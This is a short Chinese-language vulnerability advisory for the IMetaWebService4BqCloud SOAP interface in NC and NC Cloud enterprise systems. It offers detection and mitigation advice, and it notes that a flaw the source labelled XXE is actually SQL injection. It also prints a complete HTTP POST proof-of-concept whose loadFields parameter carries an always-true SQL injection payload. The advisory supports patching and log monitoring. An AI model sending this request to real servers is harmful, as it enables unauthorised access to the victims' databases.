漏洞描述
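NC 及 NC Cloud 系统的 WebService 接口 IMetaWebService4BqCloud 存在漏洞，可被利用实现 SQL 注入（原文将其归类为 XXE 漏洞；但下方请求体中没有 DOCTYPE 或外部实体声明，注入点是 loadFields 方法的 imet:string 参数）。排查与缓解：限制外部网络对 /uapws/service/ 路径的访问，并按厂商公告安装补丁；在 Web 访问日志或 WAF 中重点关注发往该接口、Soapaction 为 urn:loadFields 且参数中含有单引号或 SQL 关键字的 POST 请求。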
POST /uapws/service/uap.pubitf.ae.meta.IMetaWebService4BqCloud HTTP/1.1
Host:
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 310
Content-Type: text/xml
Soapaction: urn:loadFields
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:imet="http://meta.ae.pubitf.uap/IMetaWebService4BqCloud"><soapenv:Header/><soapenv:Body><imet:loadFields><!--Optional:--><imet:string>SmartModel^2'+or+1%3d%3d1+--</imet:string></imet:loadFields></soapenv:Body></soapenv:Envelope>